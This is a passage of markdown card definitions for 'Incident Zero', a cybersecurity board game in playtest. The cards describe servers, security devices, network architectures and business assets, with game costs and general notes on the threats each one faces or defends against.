Key Concerns: - Placement visibility (attacker must discover it to trigger it) - Believability (must look like real system worth attacking) - Monitoring (honeypot access must be logged securely) - Honeypot maintenance (must not appear unmaintained) - Response procedures (what do we do when honeypot is triggered?)
Defense Considerations: - Canary tokens (watermarked documents, fake credentials) - Fake administrative account (admin account that isn't really admin) - Fake file server with sensitive-looking shares - Fake VIP email addresses on mailing lists - Alerting on any access to honeypot (immediate incident response)
Network Placement: Among legitimate resources (cannot appear isolated)
Interactions: - Used with Deception Technology defense card in Hardening - Network design: "place honeypots where attackers will likely look" - Zero false positives: any honeypot access = real attack - Expansion deck discusses advanced honeypot strategies
| Card | Server Type | Cost | Capacity | Complexity | Availability | Key Risk |
|---|---|---|---|---|---|---|
| SRV-01 | Email Server | 8 | 1 | 2/4 | 99.9% | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | 1 | 2/4 | 99.5% | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | 1 | 3/4 | 99.9% | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | 2 | 2/4 | 99% | SMB Laterals, Ransomware |
| SRV-05 | Domain Controller | 12 | 2 | 3/4 | 99.5% | Mimikatz, Complete Compromise |
| SRV-06 | Development | 5 | 3 | 2/4 | 80% | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | 1 | 2/4 | 95% | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | 2 | 2/4 | 99% | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | 1 | 3/4 | 90% | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot | 7 | 1 | 1/4 | N/A | Detection, Early Warning |
Each server fulfills one or more Asset Card requirements: - SRV-01 → Asset "Email" - SRV-02 → Asset "Web" - SRV-03 → Asset "Database" - SRV-04 → Asset "File Storage" - SRV-05 → Asset "Identity" - SRV-06 → Asset "Development" - SRV-07 → Asset "Disaster Recovery" - SRV-08 → Asset (varies—could be Email, Web, Database in cloud) - SRV-09 → Asset (legacy system supporting specific business function) - SRV-10 → Security monitoring (not a business requirement)
Network Building Module: Server Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/core-deck/security-device-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Security Device Cards represent network security appliances and tools that control traffic, detect threats, and enforce policies between network segments.
Type: Perimeter Control Cost: 12 Budget Placement: Network edge (between internet and internal network) Primary Function: Block unauthorized inbound/outbound traffic
Description: Traditional stateful firewall (Cisco ASA, Palo Alto Networks, Fortinet FortiGate) at network perimeter. Enforces allow/deny rules based on source IP, destination IP, protocol, and port. First line of defense against external attacks.
What It Protects Against: - Unauthorized inbound access attempts - Unauthorized outbound connections (C2 beaconing, data exfiltration) - Network reconnaissance from internet - DDoS attacks (basic flood protection)
What It Doesn't Protect Against: - Application-layer attacks (SQL injection, XSS) - Lateral movement within network (operates at L3/L4 only) - Encrypted traffic inspection (needs deep packet inspection) - Insider threats or authorized-but-malicious access
Network Interactions: - Required for: Most organizations (perimeter protection is baseline) - Works with: Web Server (must allow inbound HTTP/HTTPS), Email Server (SMTP/POP3/IMAP) - Supports: Database (prevents inbound database connections from internet)
Ruleset Complexity: Medium (5-10 rules for basic setup, 50+ for mature organization)
Performance Impact: Minimal for small networks, can become bottleneck at scale
Type: Threat Detection Cost: 10 Budget Placement: Internal network (behind firewall, in front of critical systems) Primary Function: Detect suspicious network traffic patterns
Description: Network-based IDS (Snort, Zeek, Suricata) that inspects all traffic and alerts on suspicious patterns. Uses signature matching and/or behavioral analysis to identify known attacks and anomalous traffic.
What It Protects Against: - Known attack patterns (exploits, vulnerability scans) - Port scanning and reconnaissance - Lateral movement (SMB, RDP abuse) - Data exfiltration patterns (unusual volume, unusual destination) - Command & Control (C2) communication
What It Doesn't Protect Against: - Zero-day exploits (no signature exists) - Encryption inspection (needs decryption) - Insider threats (authorized users on authorized systems) - Application-layer attacks (SQL injection, XSS still pass through)
Network Interactions: - Works with: SIEM (IDS alerts feed into SIEM for correlation) - Supports: Detection of T-04 (Lateral Movement), T-09 (C2 Beaconing) in Incident Response - Complements: IPS (IDS detects, IPS blocks; often paired)
Signature Maintenance: High (requires weekly/daily signature updates from threat intelligence)
Performance Impact: Medium (packet inspection adds latency, can slow network)
Type: Threat Prevention Cost: 14 Budget Placement: Internal network (actively blocks malicious traffic) Primary Function: Block suspicious traffic in real-time
Description: Network-based IPS (actively protective version of IDS). Can block traffic in addition to alerting. Inline placement allows real-time threat blocking.
What It Protects Against: - Everything IDS protects against (detection + blocking) - Exploit attempts against known vulnerabilities - Worm propagation - Policy violations
What It Doesn't Protect Against: - Same limitations as IDS, plus: - False positive blocking (can block legitimate traffic) - Encrypted traffic inspection limitations - Zero-day exploits
Network Interactions: - Works with: WAF on web traffic (IPS for network, WAF for applications) - Works with: Firewall (layered network defense) - Supports: Defense against T-02 (Watering Hole), T-05 (Kernel Exploit) in Incident Response
Tuning Complexity: High (false positives require tuning; too aggressive = blocks legitimate traffic)
Performance Impact: Medium-High (real-time inspection + blocking adds latency)
Risk: Misconfigured IPS can block critical business traffic
Type: Availability & Performance Cost: 8 Budget Placement: In front of multiple web servers Primary Function: Distribute traffic across multiple servers
Description: Load balancer (F5, Citrix NetScaler, nginx, HAProxy) distributes incoming traffic across multiple backend servers. Increases availability and performance.
What It Protects Against: - Single server failure (if one web server fails, traffic routes to others) - DDoS attacks (distributes attack traffic across multiple servers) - Overload attacks (can queue excess requests)
What It Doesn't Protect Against: - Application vulnerabilities - Malicious traffic targeting multiple backends - Session hijacking - Backend compromise (load balancer can't protect compromised backend)
Network Interactions: - Requires: Web Server (needs multiple instances for load balancing to make sense) - Works with: Web Server redundancy (2+ web servers behind load balancer) - Supports: Web application availability in Incident Response scenarios
Health Check Mechanism: Monitors backend servers; removes unhealthy servers automatically
Cost-Benefit: Low cost (8 Budget) but high value if you have multiple web servers
Type: Remote Access Control Cost: 9 Budget Placement: Network perimeter (between internet and internal network) Primary Function: Secure remote access for employees/contractors
Description: VPN concentrator (Cisco AnyConnect, Palo Alto Prisma Access, F5 BIG-IP) that creates encrypted tunnels for remote users. Allows employees to securely access internal resources from outside network.
What It Protects Against: - Man-in-the-middle attacks on remote user traffic - Credential interception (traffic encrypted) - Unauthorized access to internal resources (authentication required) - IP spoofing (tunnel validates source)
What It Doesn't Protect Against: - Weak VPN credentials (still vulnerable to brute force) - Compromised endpoint connecting via VPN (malware on home computer) - Insider threats (authorized user with legitimate credentials) - Application vulnerabilities accessed through VPN
Network Interactions: - Works with: Domain Controller (VPN user auth) - Works with: MFA (VPN should require MFA) - Supports: Remote work scenarios (necessary for distributed teams)
Authentication Complexity: Requires MFA for security (otherwise easy brute force)
Cost-Benefit: Necessary for remote work, but alone insufficient (needs MFA)
Type: Email Security Cost: 6 Budget Placement: Network perimeter (filters incoming/outgoing email) Primary Function: Filter spam, phishing, and malware in email
Description: Email security appliance (Proofpoint, Mimecast, Cisco Email Security) that filters all incoming/outgoing email. Scans for phishing, malware, data exfiltration attempts.
What It Protects Against: - Phishing emails (signature and behavior-based detection) - Email-based malware (attachments, links) - Spam (reduces alert fatigue) - Data exfiltration via email (DLP for email) - Email spoofing (validates SPF/DKIM/DMARC)
What It Doesn't Protect Against: - User clicks on phishing links (user training needed) - Advanced phishing with legitimate credentials - Compromised internal email account sending from inside - Zero-day malware in attachments
Network Interactions: - Works with: Email Server (filters before reaching server) - Works with: User Security Training (filters + training = defense-in-depth) - Supports: Defense against T-01 (Phishing) in Incident Response
Signature Maintenance: Very high (email threats change daily)
User Experience Impact: Email delays (milliseconds) are imperceptible; false positives = missed emails
Type: Application-Layer Protection Cost: 11 Budget Placement: In front of web server Primary Function: Block application-layer attacks (SQL injection, XSS, etc.)
Description: Web Application Firewall (ModSecurity, Cloudflare WAF, AWS WAF) that inspects HTTP traffic and blocks malicious payloads. Understands web application protocols unlike traditional firewall.
What It Protects Against: - SQL injection attacks - Cross-site scripting (XSS) - Cross-site request forgery (CSRF) - Remote code execution (RCE) - Malicious file uploads - Buffer overflows in web apps
What It Doesn't Protect Against: - Logic flaws in application (WAF can't fix broken business logic) - Authenticated attacks (user is authorized) - Distributed attacks across many IPs (WAF can't distinguish) - Zero-day application vulnerabilities (no rule exists)
Network Interactions: - Requires: Web Server (only protects web traffic) - Works with: IPS (network-level and application-level defense) - Supports: Defense against T-02 (Watering Hole) in Incident Response
Rule Maintenance: Medium (OWASP rules are standardized, vendor maintains them)
False Positive Rate: Medium (needs tuning for specific web application)
Performance Impact: Medium (application inspection adds latency)
Type: Network Architecture Control Cost: 10 Budget Placement: Internal network (between segmented network zones) Primary Function: Enforce network segmentation via VLANs and ACLs
Description: Layer 3 switch or router configured for network segmentation. Implements VLANs (virtual LANs) and layer 3 filtering to separate network into zones (DMZ, User segment, Server segment, Admin segment).
What It Protects Against: - Lateral movement via SMB and other internal protocols - Credential dumping spread (isolated networks can't reach DCs) - Compromised user system accessing servers directly - Insider threats (restrictions on data access) - Data exfiltration to external media (if USB segment is isolated)
What It Doesn't Protect Against: - Attacks within same segment (switch can't prevent user↔user attacks) - Routing around segmentation (if misconfigured) - Physical network attacks (layer 1 problems) - Encrypted tunneling out of segment (if firewall rule allows)
Network Interactions: - Works with: Firewall (firewall rules enforce segmentation policies) - Works with: Database Server (database in isolated segment) - Works with: Zero Trust (segmentation is prerequisite for zero trust) - Supports: Defense against T-04 (Lateral Movement) in Incident Response
Configuration Complexity: High (requires planning of segment boundaries and rules)
Cost-Benefit: Very high ROI (prevents lateral movement for 10 Budget)
Type: Threat Monitoring & Investigation Cost: 15 Budget Placement: Central monitoring (logs from all devices) Primary Function: Aggregate logs and detect threats via correlation
Description: Enterprise SIEM (Splunk, Elastic, QRadar, ArcSight) that collects logs from all systems, correlates events, and alerts on suspicious patterns. Foundation of mature incident response program.
What It Protects Against: - Multi-step attack patterns (correlation finds chains) - Persistence mechanisms (scheduled tasks, registry changes logged) - Credential abuse (failed login spikes) - Insider threats (excessive file access, off-hours activity) - Data exfiltration (unusual volume to unusual destination)
What It Doesn't Protect Against: - Attacks happening faster than SIEM ingests logs - False negatives (misconfigured rules miss attacks) - Encrypted traffic inspection (needs decryption) - Malware on endpoint (needs EDR, not SIEM)
Network Interactions: - Requires: Log Centralization deployment (needs logs to analyze) - Works with: IDS/IPS alerts (SIEM correlates with network alerts) - Supports: Incident Response investigation (SIEM data essential for forensics) - Critical for: Hardening module detection (SIEM detects Pentester Tactics)
Data Requirements: Massive (can be 10+ GB/day for large organizations)
Maintenance: Very high (tuning rules, managing data retention, responding to false positives)
Value: Essential for organizations that need incident detection
Type: Deception & Detection Cost: 8 Budget Placement: Isolated segment (mimics legitimate infrastructure) Primary Function: Detect lateral movement and reconnaissance
Description: Network of decoy systems (not SRV-10 honeypot server, but entire segment) designed to attract attackers. Any access to honeypot network indicates active attacker.
What It Protects Against: - Lateral movement (attacker triggers honeypot while exploring) - Network reconnaissance (if honeypot is discovered) - Ransomware spread (if honeypot is in ransomware path) - Insider reconnaissance (any access to honeypot = red flag)
What It Doesn't Protect Against: - Attacks that don't trigger honeypot (if attacker follows direct path) - Honeypot visibility (attacker must find it to trigger it) - False positives (must be designed to avoid accidental triggers)
Network Interactions: - Works with: Network Segmentation (honeypot in isolated but accessible segment) - Works with: SIEM (honeypot triggers feed into SIEM) - Supports: Detection in Hardening module (Deception Technology defense)
Maintenance: Medium (must keep honeypot looking alive and attractive)
Cost-Benefit: Low cost (8 Budget) with high detection value (zero false positives)
| Card | Device Type | Cost | Primary Vectors | Placement |
|---|---|---|---|---|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL | Perimeter |
| SEC-02 | IDS | 10 | MALWARE, NETWORK | Internal |
| SEC-03 | IPS | 14 | MALWARE, WEB, NETWORK | Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) | Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK | Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE | Perimeter |
| SEC-07 | WAF | 11 | WEB, MALWARE | Web Tier |
| SEC-08 | Network Segmentation | 10 | CREDENTIAL, NETWORK | Internal |
| SEC-09 | SIEM | 15 | Multiple (detection) | Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) | Isolated |
Budgets are 40-60 by difficulty (Beginner 60 / Standard 50 / Advanced 40), and the Required servers eat most of it — plan security spending around what's left.
Network Building Module: Security Device Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/core-deck/architecture-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Architecture Cards represent different network topology and design patterns. Each organization selects ONE architecture that determines how network segments are organized and how traffic flows between them.
Cost: 0 Budget Complexity: 1/5 (very simple) Security Posture: Low Performance: High (no routing/switching overhead)
Description: All systems connected to same network segment (same subnet, same broadcast domain). No network segmentation—everything can talk to everything. Traditional small office network.
Network Design:
Internet → Firewall → Switch
├─ Email Server
├─ Web Server
├─ Database Server
├─ File Server
├─ Domain Controller
└─ User Workstations
Characteristics: - All systems on same IP subnet (e.g., 192.168.1.0/24) - Single broadcast domain - No layer 3 routing between segments - Firewall only at perimeter, not internal
What This Means for Security: - Advantages: Simple to set up and manage, low cost - Disadvantages: Lateral movement is trivial (attacker on user system can reach database server directly) - Implication: If any system is compromised, entire network is at risk
Who Uses This: - Small offices with <50 people - Non-security-sensitive organizations - Organizations where ease of use matters more than security
Defenses Required: - Stronger endpoint protection (must protect each individual system) - User security training (social engineering becomes primary attack vector) - Cannot rely on network-level controls
Against Incident Response Threats: - T-04 (Lateral Movement): Trivially successful (same network) - T-06 (Mimikatz): Once DC is compromised, entire network is accessible - T-11 (Data Exfil): No segmentation to stop data movement
Cost: 5 Budget Complexity: 2/5 (simple but requires planning) Security Posture: Medium Performance: Medium (slight routing overhead)
Description: Network divided into three logical zones with firewall rules between them. This is the most common network architecture for medium-sized organizations.
Network Design:
Internet → Firewall → [DMZ Zone] → Firewall → [Internal Zone] → Firewall → [Admin Zone]
(Perimeter) ↓ ↓ ↓
Web Server File Server Domain Controller
Email Server User Workstations Admin Workstations
Database Server Backup Server
Three Zones:
If compromised, firewall prevents spread to internal zone
Internal Zone - Business systems
Cannot reach Admin Zone
Admin Zone - Administrative access and privileged systems
Firewall Rules: - Internet → DMZ: Allowed (limited ports) - DMZ → Internal: Blocked (one-way dependency if needed) - Internal → Admin: Blocked (strict isolation) - Admin → Internal: Allowed (admin management of internal systems) - Admin → DMZ: Allowed (admin management of DMZ)
What This Means for Security: - Advantages: Limits lateral movement (attacker on web server can't reach database server directly) - Disadvantages: More complex to design and manage
Who Uses This: - Most medium-sized organizations (50-500 employees) - Organizations with some web/email presence - Organizations that want segmentation without extreme complexity
Against Incident Response Threats: - T-04 (Lateral Movement): Firewall rules block direct SMB access between zones; attacker must find alternate path - T-06 (Mimikatz): DC is in Admin Zone, isolated from compromised internal system - T-11 (Data Exfil): Must exit through firewall, can be monitored
Cost: 12 Budget Complexity: 4/5 (complex, requires careful design) Security Posture: Very High Performance: Lower (strict controls add latency)
Description: Network divided into many small segments, each with strict firewall rules. No implicit trust based on network location—every connection is verified. Approximates zero-trust architecture.
Network Design:
Internet → Firewall → [DMZ Segment] → Firewall → [Each Server has own segment]
+ User segment
+ Admin segment
+ Development segment
+ Backup segment
+ Legacy segment
Each connection between segments requires explicit allow rule.
Segment Isolation: - Every major system or group gets its own segment - Database server isolated from file server - Email server isolated from web server - User workstations isolated from each other (per-user or small group segments) - Development isolated from production - Admin segment for domain controllers only - Legacy systems isolated from modern systems
Firewall Rules: - Default deny: Any traffic not explicitly allowed is blocked - Explicit allows: Every needed connection has a specific rule - Unidirectional: Rules are directional (client→server, not server→client) - Port specific: Rules specify exact port, not ranges
What This Means for Security: - Advantages: Lateral movement is nearly impossible—even if one system is compromised, firewall blocks reach to others - Disadvantages: Very complex to design, expensive to implement, difficult to troubleshoot when legitimate traffic is blocked
Who Uses This: - Large enterprises with security teams - Organizations with strict compliance requirements (finance, healthcare, government) - Organizations that assume breach and plan accordingly
Against Incident Response Threats: - T-04 (Lateral Movement): Firewall blocks attempt immediately; attacker cannot move - T-06 (Mimikatz): Even with DC credentials, accessing other systems requires approval - T-11 (Data Exfil): Exfil traffic blocked by firewall rules
Governance: Requires change management process for any new firewall rules
Cost: 8 Budget Complexity: 3/5 (cloud adds complexity) Security Posture: Medium-High (cloud provider handles some security) Performance: Medium (internet latency for cloud communication)
Description: Organization has both on-premises infrastructure AND cloud resources. Some applications run on-premises, others run in cloud (AWS, Azure, GCP).
Network Design:
Internet → Firewall → On-Premises Segment
├─ Email Server (on-prem)
├─ File Server (on-prem)
├─ Database Server (on-prem)
└─ VPN/Direct Connect → Cloud
├─ Web Server (cloud)
├─ App Server (cloud)
├─ Cloud Storage
└─ Cloud Database
Connectivity Methods: 1. VPN: Encrypted tunnel over internet (slower, cheaper) 2. Direct Connect: Dedicated network connection (faster, more expensive)
What This Means for Security: - Advantages: Flexibility (use right tool for each workload), scalability - Disadvantages: New attack surface (cloud APIs, IAM), credential management across platforms
Cloud-Specific Risks: - Misconfigured S3 buckets (public read access) - Cloud IAM overly permissive (too much access) - Cloud API keys in source code - Data residency in unexpected regions
Who Uses This: - Organizations transitioning to cloud (lift-and-shift) - Organizations with variable load (burst to cloud) - Organizations with development in cloud, production on-prem
Against Incident Response Threats: - T-04 (Lateral Movement): Can pivot from on-prem to cloud via cloud APIs - T-08 (Cloud breach): New threat class specific to cloud - T-13 (Misconfiguration): Cloud-specific attack not in traditional scenarios
Cost: 6 Budget Complexity: 2/5 (cloud provider manages complexity) Security Posture: Medium (cloud provider security + customer configuration) Performance: Excellent (cloud provider optimization)
Description: All infrastructure is cloud-based. No on-premises data center. Applications, data, and users all in cloud (AWS, Azure, GCP, or SaaS).
Network Design:
Internet → Cloud Edge
├─ Web Services (cloud)
├─ Application Services (cloud)
├─ Database (cloud)
├─ Storage (cloud)
└─ All managed by cloud provider
Deployment Models: 1. IaaS (Infrastructure as a Service): You manage VMs, they manage infrastructure 2. PaaS (Platform as a Service): You manage app, they manage platform 3. SaaS (Software as a Service): Vendor manages everything (Microsoft 365, Salesforce, Slack)
Cloud Provider Responsibilities: - Physical security of data centers - Network infrastructure - Hardware maintenance - Some security controls (network, storage)
Customer Responsibilities: - IAM configuration (who can access what) - Network configuration (security groups, VPCs) - Encryption keys (customer-managed or provider-managed) - Application security
What This Means for Security: - Advantages: Offload infrastructure security to cloud provider, auto-scaling, built-in redundancy - Disadvantages: New threat landscape (cloud-specific attacks, misconfiguration)
Cloud-Specific Risks: - IAM overly permissive (everyone can do everything) - Public buckets/storage (data visible to internet) - Unused resources (exposed services) - Cross-account/cross-tenant misconfiguration - Cloud API abuse (stolen credentials)
Who Uses This: - Startups (no on-prem infrastructure needed) - SaaS vendors (cloud is core offering) - Organizations with distributed teams (no office) - Modern organizations building on cloud-native architecture
Against Incident Response Threats: - T-08 (Cloud-specific): Entirely new threat surface - T-13 (Misconfiguration): Most common cloud vulnerability - T-07 (API abuse): Cloud APIs are attack surface
| Aspect | Flat | 3-Zone | Fully Isolated | Cloud Hybrid | Cloud First |
|---|---|---|---|---|---|
| Cost (Budget) | 0 | 5 | 12 | 8 | 6 |
| Complexity | 1/5 | 2/5 | 4/5 | 3/5 | 2/5 |
| Lateral Movement Risk | Very High | Medium | Very Low | Medium-High | Medium |
| Incident Response Difficulty | Very Easy | Medium | Hard | Hard | Hard |
| Operational Overhead | Low | Medium | High | High | Low (cloud manages) |
| Best For | Tiny orgs | Medium orgs | Large/sensitive | Hybrid migration | Cloud-native |
| Scalability | Poor | Good | Excellent | Excellent | Excellent |
| Cloud Integration | None | None | Optional | Required | Only option |
Choosing architecture affects remaining budget for servers and security devices: - ARCH-01 (Flat): 0 Budget cost, frees up budget for servers - ARCH-02 (3-Zone): 5 Budget cost, medium budget remaining - ARCH-03 (Fully Isolated): 12 Budget cost, significant budget consumed - ARCH-04 (Cloud Hybrid): 8 Budget cost, cloud connectivity cost - ARCH-05 (Cloud First): 6 Budget cost, low cost (cloud provider manages infrastructure)
Higher security architectures require more firewall rules: - ARCH-01: 0 rules needed (flat network) - ARCH-02: 10-20 rules (3-zone model) - ARCH-03: 50-100+ rules (fully isolated, per-system rules) - ARCH-04: 20-30 rules (cloud connectivity + on-prem) - ARCH-05: 10-15 rules (cloud provider manages most)
Does your organization use cloud?
├─ No → Do you have >100 people?
│ ├─ No → Choose ARCH-01 (Flat) or ARCH-02 (3-Zone)
│ └─ Yes → Do you have compliance requirements?
│ ├─ No → Choose ARCH-02 (3-Zone)
│ └─ Yes → Choose ARCH-03 (Fully Isolated)
│
├─ Partially (hybrid) → Choose ARCH-04 (Cloud Hybrid)
│
└─ Yes, entirely cloud → Choose ARCH-05 (Cloud First)
Network Building Module: Architecture Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/core-deck/asset-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Asset Cards represent business requirements or critical functions that the network must support. Each asset card describes a business need, and teams must ensure their network design includes appropriate servers/services to satisfy each requirement.
Business Function: Internal and external email communication Criticality: High (nearly universal requirement) Impact if Down: Significant (communication stops, customer requests missed) Compliance Requirements: Email retention (SOX, GDPR), encryption (HIPAA, PCI-DSS)
Description: Organization needs reliable email system for internal communication and external customer contact. Email is both critical infrastructure and significant security risk (phishing, credential attacks, data exfiltration).
Network Requirements: - Server: Email Server (SRV-01) - Protection: Email Gateway (SEC-06) for phishing/malware filtering - Optional: Load Balancer if email server needs redundancy
Security Considerations: - Email is primary phishing attack vector (T-01 in Incident Response) - Email contains sensitive information (must be encrypted and access-controlled) - Email forwarding rules can be abused for data exfiltration - Email archive must be protected and retained per compliance requirements
Dependencies: - Requires Domain Controller for user authentication - Requires backup for email archive recovery - Integrates with SIEM for email security event logging
Team Design Validation: ✓ Must Include: Email Server or equivalent email service (cloud-based OK) ✓ Should Include: Email Gateway for threat filtering ✗ Failure Condition: No email capability = cannot satisfy Asset requirement
Business Function: Public-facing web application or website Criticality: Medium (business depends on it but alternatives exist) Impact if Down: Moderate (customers cannot access services, lost sales/engagement) Compliance Requirements: PCI-DSS (if payments), WCAG accessibility
Description: Organization has public web presence—either corporate website, e-commerce site, or customer portal. Web server is exposed to internet and primary target for web exploits (SQL injection, RCE, DDoS).
Network Requirements: - Server: Web Server (SRV-02) in DMZ - Protection: WAF (SEC-07) for application-layer attack prevention - Optional: Load Balancer (SEC-04) for redundancy and DDoS protection
Security Considerations: - Web servers have highest internet attack surface - Vulnerable to web exploits (T-02 Watering Hole, T-05 Kernel Exploit in Incident Response) - DDoS attacks can take down web server - Code injection can compromise entire application - Requires patching and web application security testing
Dependencies: - Often connects to Database (for dynamic content) - May require load balancer for redundancy - Requires SIEM monitoring for web security events
Team Design Validation: ✓ Must Include: Web Server (SRV-02) or cloud-hosted web service ✓ Should Include: WAF for attack protection ✓ Should Include: Load Balancer if redundancy needed ✗ Failure Condition: No web server = Asset unsatisfied
Business Function: Data storage and retrieval for critical business data Criticality: Very High (most sensitive business data) Impact if Down: Severe (business cannot operate, financial/customer impact) Compliance Requirements: PCI-DSS, HIPAA, GDPR, SOX (depending on data type)
Description: Centralized database for customer data, financial records, operational data. Database is most valuable attack target—contains the "crown jewels." Database compromise often defines loss condition in Incident Response.
Network Requirements: - Server: Database Server (SRV-03) in restricted/admin segment - Protection: Network Segmentation (SEC-08) to limit access - Optional: Backup Server (SRV-07) for recovery capability
Security Considerations: - Database is primary exfiltration target (T-10, T-11 in Incident Response) - SQL injection attacks compromise database - Credential abuse allows unauthorized access to sensitive data - Data exfiltration is often attack goal (customer PII, financial data) - Database compromise may be game-loss condition - Must have immutable backups for recovery from ransomware
Dependencies: - Requires strong authentication (MFA, password vault) - Requires Data Loss Prevention (DLP) to prevent exfiltration - Requires encryption at rest and in transit - Requires database activity monitoring (DAM) for audit
Team Design Validation: ✓ Must Include: Database Server or equivalent data store (Cloud Workload hosting is allowed but is a recorded risk) ✓ Should Include: Network Segmentation to isolate database access ✓ Should Include: Backup Server for disaster recovery ✗ Failure Condition: No database = Asset unsatisfied OR unsecured database access = audit finding
Business Function: Shared file storage for documents, projects, compliance records Criticality: High (business relies on shared documents) Impact if Down: Moderate-High (work stops, cannot access needed files) Compliance Requirements: Data retention (GDPR), data classification (HIPAA, PCI-DSS)
Description: Shared network file storage for collaborative work. File servers often contain mixed-sensitivity data (company policy next to customer PII next to trade secrets). Poorly secured file storage is source of data exfiltration and lateral movement.
Network Requirements: - Server: File Server (SRV-04) in protected segment - Protection: Network Segmentation (SEC-08) to limit file access - Optional: DLP (in Hardening module) to prevent sensitive file exfiltration
Security Considerations: - File servers are lateral movement target (T-04 in Incident Response) - SMB protocol allows attacker to enumerate shares and attempt access - Over-permissive file permissions = data exfiltration vector - Ransomware frequently targets file servers (T-11 in Incident Response) - File permissions audit is critical for compliance
Dependencies: - Requires Domain Controller for user authentication - Requires Network Segmentation to limit SMB access - Requires backup strategy (especially for ransomware recovery) - Requires file permission auditing
Team Design Validation: ✓ Must Include: File Server or cloud file storage (OneDrive, SharePoint, Google Drive) ✓ Should Include: Network Segmentation to restrict access ✓ Should Include: Backup for ransomware recovery ✗ Failure Condition: No file storage = Asset unsatisfied
Business Function: User identity and access management Criticality: Very High (foundational to all access control) Impact if Down: Severe (cannot authenticate users, cannot operate) Compliance Requirements: MFA (various standards), audit logging (GDPR, SOX)
Description: Centralized identity system (Active Directory, Azure AD, Okta) that authenticates users and grants access to resources. Identity compromise is game-over scenario—attacker with access to identity system can impersonate any user.
Network Requirements: - Server: Domain Controller (SRV-05) in admin segment - Protection: Network Segmentation Switch (SEC-08) — keep the DC in an isolated admin zone - Optional: Second Domain Controller for redundancy (full price)
Security Considerations: - Domain Controller is most sensitive system (compromise = total infrastructure access) - Credential dumping attacks target DC (T-06 Mimikatz in Incident Response) - Compromised DC allows attacker to create backdoor accounts - Pass-the-hash attacks replay credentials from DC compromise - DC must be in isolated segment with strict access control
Dependencies: - Requires strong authentication (MFA for all DC access) - Requires privileged access workstation (PAW) for admin access - Requires immutable backup DC in separate location - Requires audit logging of all DC changes
Team Design Validation: ✓ Must Include: Domain Controller (on-premises or Azure AD) ✓ Should Include: Network Segmentation (isolated admin zone) ✓ Should Include: Second Domain Controller for redundancy (optional, full price) ✗ Failure Condition: No identity system = the Identity requirement is unsatisfied (design incomplete)
Business Function: Software development and testing environment Criticality: Medium (important but not production-critical) Requirement Strength: Recommended (v2.2) — may be satisfied by overloading another server (+1 Budget per extra service) Impact if Down: Low-Medium (development delays, but not immediate business impact) Compliance Requirements: Secrets management (API keys not hardcoded), code scanning
Description: Development and testing infrastructure where software developers build and test applications. Development environment is often overlooked security risk because developers prioritize speed over security.
Network Requirements: - Server: Development Server (SRV-06) in isolated development segment - Protection: Firewall rules prevent dev→prod lateral movement - Optional: Code repository (Git, GitHub) for version control
Security Considerations: - Development servers often contain production-like data (compliance violation) - Developers have broad access (weak access controls) - Test credentials and API keys in source code - Outdated/unpatched tools (developer tools not security tools) - Development system as lateral movement springboard to production - Source code repository is high-value target (intellectual property)
Dependencies: - Requires separate database from production (never use production data in dev) - Requires code review and secrets scanning - Requires firewall rules isolating dev from production - Requires MFA for code repository access
Team Design Validation: ✓ Should Include: Development Server, OR dev services overloaded onto another server (allowed, +1 Budget) ✓ Should Isolate: Dev network from production network ✓ Should Scan: Code for hardcoded secrets ✗ Failure Condition: Using production database in dev = data exposure/compliance violation
Business Function: Recovery capability for business continuity Criticality: Very High (determines if business survives major attack/disaster) Requirement Strength: Required (v2.2) Impact if Down: Catastrophic (cannot recover from major incident) Compliance Requirements: Backup retention, recovery SLA (RTO/RPO)
Description: Backup and disaster recovery capability. Organization needs ability to recover from data loss, ransomware, or disaster. Backup/recovery capability is often neglected until it's needed.
Network Requirements: - Server: Backup Server (SRV-07) with off-site backups - Protection: Immutable backups (WORM storage) - 3-2-1 Strategy: 3 copies, 2 media types, 1 off-site
Security Considerations: - Ransomware attacks target backup systems (T-11 in Incident Response) - Backup must be immutable (attacker cannot modify backups) - Backup must be off-site (local backup lost if data center destroyed) - Backup testing must be regular (quarterly minimum) - Backup credentials must be separate from domain (attacker cannot delete backups)
Dependencies: - Requires off-site backup location (geographically separated) - Requires immutable storage (WORM or cloud versioning) - Requires regular backup restore testing - Requires separate backup credentials
Team Design Validation: ✓ Must Include: Backup Server with off-site capability ✓ Must Test: Recovery procedures (quarterly) ✓ Must Implement: 3-2-1 strategy ✗ Failure Condition (v2.2): No Backup Server = automatic FAIL on the Disaster Recovery requirement, recorded as a CRITICAL gap (not an instant game loss — but ransomware in later modules becomes unrecoverable)
Business Function: Secure remote access for employees and contractors Criticality: Medium (became High during COVID pandemic) Impact if Down: Moderate (remote workers cannot work) Compliance Requirements: MFA (various standards), encryption, audit logging
Description: VPN or similar remote access solution for employees working from home, traveling, or off-site. Remote access expands attack surface but is necessary for modern workforce.
Network Requirements: - Device: VPN Gateway (SEC-05) at network perimeter - Protection: MFA required for all VPN access - Optional: Conditional access policies (restrict access by device/location)
Security Considerations: - VPN is attractive attack target (Credential Abuse) - Weak VPN credentials easily brute-forced (must use MFA) - Compromised home computer connecting via VPN = internal network at risk - VPN traffic must be encrypted - VPN access must be logged and audited
Dependencies: - Requires Domain Controller for user authentication - Requires MFA (cannot rely on password alone) - Requires endpoint security on remote devices - Requires SIEM monitoring of VPN access
Team Design Validation: ✓ Should Include: VPN Gateway for remote access ✓ Must Implement: MFA for VPN access ✓ Should Monitor: VPN access logs in SIEM ✗ Failure Condition: Weak VPN security (no MFA) = credential attack vector
